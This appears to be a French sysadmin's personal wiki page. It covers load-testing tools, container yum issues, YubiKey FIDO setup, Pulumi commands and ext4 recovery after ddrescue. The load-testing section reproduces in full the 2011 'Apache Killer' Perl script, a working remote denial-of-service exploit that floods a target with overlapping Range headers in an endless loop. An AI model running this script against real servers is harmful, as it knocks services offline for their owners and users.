Table des matières
3 billet(s) pour janvier 2026
| Notes rsh rcp | 2026/01/21 18:08 | Jean-Baptiste |
| Git - Duplication d'un dépôt | 2026/01/19 10:22 | Jean-Baptiste |
| Exemple simple de conf Nagios | 2026/01/14 10:07 | Jean-Baptiste |
Perf test de charge
Liens :
Outils analyse :
- atop
- sar / sysstat
- tload
- munin
Outils charge :
- jmeters
- ab (apache)
- artillery.io
- gatling
- script perl Apache Killer (Remote DOS Perl Script)
- hey
Autre :
Jmeter
Voir aussi :
- Gatling
Voir
AB
Voir aussi :
- httperf
Bloquer les attaques DOS
https://www.devside.net/wamp-server/load-testing-apache-with-ab-apache-bench
Exemple :
ab -n 1000 -c 5 http://acme.fr/ ab -r -n 100 -c 10 -k -H "Accept-Encoding: gzip, deflate" http://acme.fr/ ab -n 500 -c 100 -g out.data http://acme.fr/ ab -n 10 -c 5 -A utilisateur:P@ssw0rd http://acme.fr/
-n : nombre de requêtes\ -c : concurence, nombre de requête simultanées\ -k : HTTP KeepAlive\ -e apache.csv : Export les données dans un fihcier CSV\ -r : Ne pas se terminer si erreur sur le socket\ -f : Spécificer le protocol SSL/TLS\ -A : Authentification\ -C : cookie-name=value
Script Perl Apache Killer (Remote DOS Perl Script)
Source : http://seclists.org/fulldisclosure/2011/Aug/175
killapache_pl
#Apache httpd Remote Denial of Service (memory exhaustion) #By Kingcope #Year 2011 # # Will result in swapping memory to filesystem on the remote side # plus killing of processes when running out of swap space. # Remote System becomes unstable. # use IO::Socket; use Parallel::ForkManager; sub usage { print "Apache Remote Denial of Service (memory exhaustion)\n"; print "by Kingcope\n"; print "usage: perl killapache.pl <host> [numforks]\n"; print "example: perl killapache.pl www.example.com 50\n"; } sub killapache { print "ATTACKING $ARGV[0] [using $numforks forks]\n"; $pm = new Parallel::ForkManager($numforks); $|=1; srand(time()); $p = ""; for ($k=0;$k<1300;$k++) { $p .= ",5-$k"; } for ($k=0;$k<$numforks;$k++) { my $pid = $pm->start and next; $x = ""; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp'); $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; print $sock $p; while(<$sock>) { } $pm->finish; } $pm->wait_all_children; print ":pPpPpppPpPPppPpppPp\n"; } sub testapache { my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp'); $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; print $sock $p; $x = <$sock>; if ($x =~ /Partial/) { print "host seems vuln\n"; return 1; } else { return 0; } } if ($#ARGV < 0) { usage; exit; } if ($#ARGV > 1) { $numforks = $ARGV[1]; } else {$numforks = 50;} $v = testapache(); if ($v == 0) { print "Host does not seem vulnerable\n"; exit; } while(1) { killapache(); }
Pb yum - L'appel à la commande yum reset la conf yum.repos.d
podman run -ti aah.acme.local/ee-minimal-rhel8:latest /bin/bash cat /etc/yum.repo.d/redhat.repo microdnf update error: package python3-pathspec-0.6.0-1.el8.noarch cannot be verified and repo Default_Organization_EPEL8_EPEL8_x86_64 is GPG enabled: /var/cache/yum/metadata/Default_Organization_EPEL8_EPEL8_x86_64-8-x86_64/packages/python3-pathspec-0.6.0-1.el8.noarch.rpm could not be verified. /var/cache/yum/metadata/Default_Organization_EPEL8_EPEL8_x86_64-8-x86_64/packages/python3-pathspec-0.6.0-1.el8.noarch.rpm: digest: SIGNATURE
A l'intérieur d'un conteneur à chaque appel à la commande microdnf le fichier /etc/yum.repo.d/redhat.repo est réécrasé.
La conf provient de Satellite.
/etc/rhsm-host/rhsm.conf
[server] hostname = lb-capsule.acme.local [rhsm] baseurl = https://lb-capsule.acme.local/pulp/repos
Je test
sed -i -e 's/^gpgcheck=true/gpgcheck=false/g' /etc/yum.repos.d/redhat.repo
Mais la conf est réécrasée, il n'y a pas de persistance.
Solution
mkdir /var/lib/rhsm
Pb YubiKey FIDO
sudo apt-get install fido2-tools
$ fido2-token -L /dev/hidraw2: vendor=0x1050, product=0x0407 (Yubico YubiKey OTP+FIDO+CCID) $ fido2-token -I /dev/hidraw2 proto: 0x02 major: 0x05 minor: 0x02 build: 0x07 caps: 0x05 (wink, cbor, msg) version strings: U2F_V2, FIDO_2_0, FIDO_2_1_PRE extension strings: credProtect, hmac-secret transport strings: nfc, usb algorithms: es256 (public-key), eddsa (public-key) aaguid: 2fc0579f811347eab116bb5a8db9202a options: rk, up, noplat, clientPin, credentialMgmtPreview maxmsgsiz: 1200 maxcredcntlst: 8 maxcredlen: 128 maxlargeblob: 0 fwversion: 0x0 pin protocols: 1 pin retries: 5 uv retries: undefined $ FIDO_DEBUG=1 fido2-token -C /dev/hidraw0 fido_hid_unix_open: open /dev/hidraw0: Permission denied fido_dev_open_tx: dev->io.open fido2-token: fido_dev_open /dev/hidraw0: FIDO_ERR_INTERNAL $ ls -l /dev/hidraw0 crw------- 1 root root 244, 0 Aug 3 19:45 /dev/hidraw0
curl https://raw.githubusercontent.com/Yubico/libu2f-host/master/70-u2f.rules |sudo tee /etc/udev/rules.d/70-u2f.rules sudo systemctl restart udev fido2-token -L
$ pamu2fcfg >> ~/.config/Yubico/u2f_keys Enter PIN for /dev/hidraw2:
Changer le PIN pour FIDO
sudo apt-get install yubikey-manager
ykman fido access change-pin
Cloud Pulumi
Voir aussi :
- Terraform / OpenTofu
- Crossplane / Kubevela
- Winglang / Darklang
Voir :
- Deskypus
Pulumi
openssl rand -base64 32 | sed -e "y/\\/+/\$_/" -e "s/=//g" > ~/.pulumi/passphrase.cfg chmod 600 ~/.pulumi/passphrase.cfg export PULUMI_CONFIG_PASSPHRASE_FILE=~/.pulumi/passphrase.cfg pulumi login --local pulumi stack init pulumi stack ls pulumi config set cloud:provider aws pulumi config set aws:region us-west-2 pulumi stack up curl $(pulumi stack output url) pulumi logs -f pulumi destroy --yes pulumi stack rm --yes
Pb wrong fs type bad option bad superblock
Suite à ddrescue /dev/sdc1 sur /dev/sdd1 avec destination plus petit que original.
# mount -o ro /dev/sdd1 /mnt/
mount: wrong fs type, bad option, bad superblock on /dev/sdd1,
missing codepage or helper program, or other error
In some cases useful info is found in syslog - try
dmesg | tail or so.
# dmesg
[2416788.550500] EXT4-fs (sdd1): bad geometry: block count 244190390 exceeds size of device (244182016 blocks)
# lsblk
sdd 8:48 0 931,5G 0 disk
└─sdd1 8:49 0 931,5G 0 part
# fdisk -s /dev/sdd
976729088
# fdisk -s /dev/sdd1
976728064
sfdisk -d /dev/sdd >sdd.txt #dd if=/dev/zero of=/dev/sdd bs=512 count=1 #sfdisk /dev/sdd <sdd.txt
- sdd.txt
# partition table of /dev/sdd unit: sectors /dev/sdd1 : start= 2048, size=1953456128, Id=83 /dev/sdd2 : start= 0, size= 0, Id= 0 /dev/sdd3 : start= 0, size= 0, Id= 0 /dev/sdd4 : start= 0, size= 0, Id= 0
Règle de trois :
1 953 456 128 / 244 182 016 = 8
244 190 390 * 8 = 1 953 523 120
fsck.ext4 /dev/sdd
Autres
http://wiki.linuxquestions.org/wiki/Resize2fs
umount /dev/myGroup/myVol e2fsck -f /dev/myGroup/myVol resize2fs -M /dev/myGroup/myVol lvreduce /dev/myGroup/myVol mount /dev/myGroup/myVol
